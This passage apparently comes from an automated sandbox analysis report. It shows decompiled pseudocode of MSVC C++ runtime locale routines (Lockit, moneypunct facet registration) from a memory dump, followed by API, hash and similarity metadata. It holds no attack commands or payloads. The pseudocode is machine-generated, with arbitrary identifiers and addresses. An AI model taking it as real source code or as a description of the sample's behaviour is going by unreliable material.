																		__eflags = E6D491409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t462 - 0x20);
																			E6D4A3D74(_t462 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t327, _t434, _t445, 0x14);
																			E6D486653(_t462 - 0x14, 0);
																			_t446 =  *0x6d546de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6D46161C(0x6d546d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6D4866BA(_t462 - 0x14);
																				return E6D4A0075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6D491471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t462 - 0x20);
																						E6D4A3D74(_t462 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t327, _t435, _t446, 0x14);
																						E6D486653(_t462 - 0x14, 0);
																						_t447 =  *0x6d546dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6D46161C(0x6d546da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6D4866BA(_t462 - 0x14);
																							return E6D4A0075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6D4914EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t462 - 0x20);
																									E6D4A3D74(_t462 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t327, _t436, _t447, 0x14);
																									E6D486653(_t462 - 0x14, 0);
																									_t448 =  *0x6d546dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6D46161C(0x6d546d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6D4866BA(_t462 - 0x14);
																										return E6D4A0075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6D491558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t462 - 0x20);
																												E6D4A3D74(_t462 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t327, _t437, _t448, 0x14);
																												E6D486653(_t462 - 0x14, 0);
																												_t449 =  *0x6d546e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6D46161C(0x6d546dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6D4866BA(_t462 - 0x14);
																													return E6D4A0075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6D4915C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t462 - 0x20);
																															E6D4A3D74(_t462 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t327, _t438, _t449, 0x14);
																															E6D486653(_t462 - 0x14, 0);
																															_t450 =  *0x6d546dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6D46161C(0x6d546d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6D4866BA(_t462 - 0x14);
																																return E6D4A0075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6D49162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6D461438(_t397);
																																		E6D4A3D74(_t462 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6d4ec0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6D49542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6D4A0075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6D486FD3(__eflags, _t439);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6d546dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6D486FD3(__eflags, _t438);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6d546e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6D486FD3(__eflags, _t437);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6d546dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6D486FD3(__eflags, _t436);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6d546dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6D486FD3(__eflags, _t435);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6d546de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6D486FD3(__eflags, _t434);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6d546ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6D486FD3(__eflags, _t433);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6d546db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6D486FD3(__eflags, _t432);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6d546dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6D486FD3(__eflags, _t431);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6d546dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6D486FD3(__eflags, _t430);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6d546dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F6C4
int.LIBCPMT ref: 6D48F6DB

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D48F6FE
std::_Facet_Register.LIBCPMT ref: 6D48F715
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F735
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F753

Strings

|mTm, xrefs: 6D48F6CF

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |mTm
API String ID: 113178234-2910199294
Opcode ID: e7b3cbbe14d36b18b5dd983b3a717c75d62ae2bc3277c9bde7ec6110481a1efa
Instruction ID: 1d29ac481b75127ef3e36e840aa79f693c05b7897c3641624c612656b13c57c8
Opcode Fuzzy Hash: e7b3cbbe14d36b18b5dd983b3a717c75d62ae2bc3277c9bde7ec6110481a1efa
Instruction Fuzzy Hash: F211E0758086699BCF01EBA4C850EEDBB74AF94314F2A401CD612BB391CB70DD01C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t902 - 0x14, 0);
				_t861 =  *0x6d546db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6D46161C(0x6d546d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6D4866BA(_t902 - 0x14);
					return E6D4A0075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6D490DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t902 - 0x20);
							E6D4A3D74(_t902 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t840, _t861, 0x14);
							E6D486653(_t902 - 0x14, 0);
							_t862 =  *0x6d546dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6D46161C(0x6d546b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6D4866BA(_t902 - 0x14);
								return E6D4A0075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6D490E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t902 - 0x20);
										E6D4A3D74(_t902 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t637, _t841, _t862, 0x14);
										E6D486653(_t902 - 0x14, 0);
										_t863 =  *0x6d546de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6D46161C(0x6d546d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6D4866BA(_t902 - 0x14);
											return E6D4A0075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6D490EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t902 - 0x20);
													E6D4A3D74(_t902 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t637, _t842, _t863, 0x14);
													E6D486653(_t902 - 0x14, 0);
													_t864 =  *0x6d546db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6D46161C(0x6d546d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6D4866BA(_t902 - 0x14);
														return E6D4A0075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6D490F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t902 - 0x20);
																E6D4A3D74(_t902 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t637, _t843, _t864, 0x14);
																E6D486653(_t902 - 0x14, 0);
																_t865 =  *0x6d546dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6D46161C(0x6d546d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6D4866BA(_t902 - 0x14);
																	return E6D4A0075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6D490F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t902 - 0x20);
																			E6D4A3D74(_t902 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t637, _t844, _t865, 0x14);
																			E6D486653(_t902 - 0x14, 0);
																			_t866 =  *0x6d546dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6D46161C(0x6d546d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6D4866BA(_t902 - 0x14);
																				return E6D4A0075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6D490FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t902 - 0x20);
																						E6D4A3D74(_t902 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t637, _t845, _t866, 0x14);
																						E6D486653(_t902 - 0x14, 0);
																						_t867 =  *0x6d546df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6D46161C(0x6d546d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6D4866BA(_t902 - 0x14);
																							return E6D4A0075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6D491057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t902 - 0x20);
																									E6D4A3D74(_t902 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t637, _t846, _t867, 0x14);
																									E6D486653(_t902 - 0x14, 0);
																									_t868 =  *0x6d546dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6D46161C(0x6d546d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6D4866BA(_t902 - 0x14);
																										return E6D4A0075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6D4910BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t902 - 0x20);
																												E6D4A3D74(_t902 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t637, _t847, _t868, 0x14);
																												E6D486653(_t902 - 0x14, 0);
																												_t869 =  *0x6d546df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6D46161C(0x6d546da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6D4866BA(_t902 - 0x14);
																													return E6D4A0075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6D491127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t902 - 0x20);
																															E6D4A3D74(_t902 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t637, _t848, _t869, 0x14);
																															E6D486653(_t902 - 0x14, 0);
																															_t870 =  *0x6d546df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6D46161C(0x6d546da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6D4866BA(_t902 - 0x14);
																																return E6D4A0075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6D4911AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t902 - 0x20);
																																		E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t637, _t849, _t870, 0x14);
																																		E6D486653(_t902 - 0x14, 0);
																																		_t871 =  *0x6d546dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6D46161C(0x6d546d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6D4866BA(_t902 - 0x14);
																																			return E6D4A0075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6D491230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t902 - 0x20);
																																					E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t637, _t850, _t871, 0x14);
																																					E6D486653(_t902 - 0x14, 0);
																																					_t872 =  *0x6d546dc4; // 0x0
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6D46161C(0x6d546d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
																																						E6D4866BA(_t902 - 0x14);
																																						return E6D4A0075(_t851);
																																					} else {
																																						__eflags = _t872;
																																						if(_t872 == 0) {
																																							_push( *((intOrPtr*)(_t902 + 8)));
																																							_push(_t902 - 0x10);
																																							__eflags = E6D4912B4(_t637, _t717, _t838, _t851, _t872) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t902 - 0x20);
																																								E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t637, _t851, _t872, 0x14);
																																								E6D486653(_t902 - 0x14, 0);
																																								_t873 =  *0x6d546dd8; // 0x0
																																								 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																								 *(_t902 - 0x10) = _t873;
																																								_t449 = E6D46161C(0x6d546d84);
																																								_t724 =  *((intOrPtr*)(_t902 + 8));
																																								_t852 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t449);
																																								__eflags = _t852;
																																								if(_t852 != 0) {
																																									L89:
																																									E6D4866BA(_t902 - 0x14);
																																									return E6D4A0075(_t852);
																																								} else {
																																									__eflags = _t873;
																																									if(_t873 == 0) {
																																										_push( *((intOrPtr*)(_t902 + 8)));
																																										_push(_t902 - 0x10);
																																										__eflags = E6D491339(_t637, _t724, _t838, _t852, _t873) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t902 - 0x20);
																																											E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t637, _t852, _t873, 0x14);
																																											E6D486653(_t902 - 0x14, 0);
																																											_t874 =  *0x6d546db0; // 0x0
																																											 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																											 *(_t902 - 0x10) = _t874;
																																											_t462 = E6D46161C(0x6d546d64);
																																											_t731 =  *((intOrPtr*)(_t902 + 8));
																																											_t853 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t462);
																																											__eflags = _t853;
																																											if(_t853 != 0) {
																																												L96:
																																												E6D4866BA(_t902 - 0x14);
																																												return E6D4A0075(_t853);
																																											} else {
																																												__eflags = _t874;
																																												if(_t874 == 0) {
																																													_push( *((intOrPtr*)(_t902 + 8)));
																																													_push(_t902 - 0x10);
																																													__eflags = E6D4913A1(_t637, _t731, _t838, _t853, _t874) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t902 - 0x20);
																																														E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t637, _t853, _t874, 0x14);
																																														E6D486653(_t902 - 0x14, 0);
																																														_t875 =  *0x6d546ddc; // 0x0
																																														 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																														 *(_t902 - 0x10) = _t875;
																																														_t475 = E6D46161C(0x6d546d88);
																																														_t738 =  *((intOrPtr*)(_t902 + 8));
																																														_t854 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t475);
																																														__eflags = _t854;
																																														if(_t854 != 0) {
																																															L103:
																																															E6D4866BA(_t902 - 0x14);
																																															return E6D4A0075(_t854);
																																														} else {
																																															__eflags = _t875;
																																															if(_t875 == 0) {
																																																_push( *((intOrPtr*)(_t902 + 8)));
																																																_push(_t902 - 0x10);
																																																__eflags = E6D491409(_t637, _t738, _t838, _t854, _t875) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D461438(_t902 - 0x20);
																																																	E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t637, _t854, _t875, 0x14);
																																																	E6D486653(_t902 - 0x14, 0);
																																																	_t876 =  *0x6d546de0; // 0x0
																																																	 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																	 *(_t902 - 0x10) = _t876;
																																																	_t488 = E6D46161C(0x6d546d8c);
																																																	_t745 =  *((intOrPtr*)(_t902 + 8));
																																																	_t855 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t488);
																																																	__eflags = _t855;
																																																	if(_t855 != 0) {
																																																		L110:
																																																		E6D4866BA(_t902 - 0x14);
																																																		return E6D4A0075(_t855);
																																																	} else {
																																																		__eflags = _t876;
																																																		if(_t876 == 0) {
																																																			_push( *((intOrPtr*)(_t902 + 8)));
																																																			_push(_t902 - 0x10);
																																																			__eflags = E6D491471(_t637, _t745, _t838, _t855, _t876) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D461438(_t902 - 0x20);
																																																				E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e83cf, _t637, _t855, _t876, 0x14);
																																																				E6D486653(_t902 - 0x14, 0);
																																																				_t877 =  *0x6d546dfc; // 0x0
																																																				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																				 *(_t902 - 0x10) = _t877;
																																																				_t501 = E6D46161C(0x6d546da8);
																																																				_t752 =  *((intOrPtr*)(_t902 + 8));
																																																				_t856 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t501);
																																																				__eflags = _t856;
																																																				if(_t856 != 0) {
																																																					L117:
																																																					E6D4866BA(_t902 - 0x14);
																																																					return E6D4A0075(_t856);
																																																				} else {
																																																					__eflags = _t877;
																																																					if(_t877 == 0) {
																																																						_push( *((intOrPtr*)(_t902 + 8)));
																																																						_push(_t902 - 0x10);
																																																						__eflags = E6D4914EC(_t637, _t752, _t838, _t856, _t877) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D461438(_t902 - 0x20);
																																																							E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																																							asm("int3");
																																																							E6D4A00AC(0x6d4e83cf, _t637, _t856, _t877, 0x14);
																																																							E6D486653(_t902 - 0x14, 0);
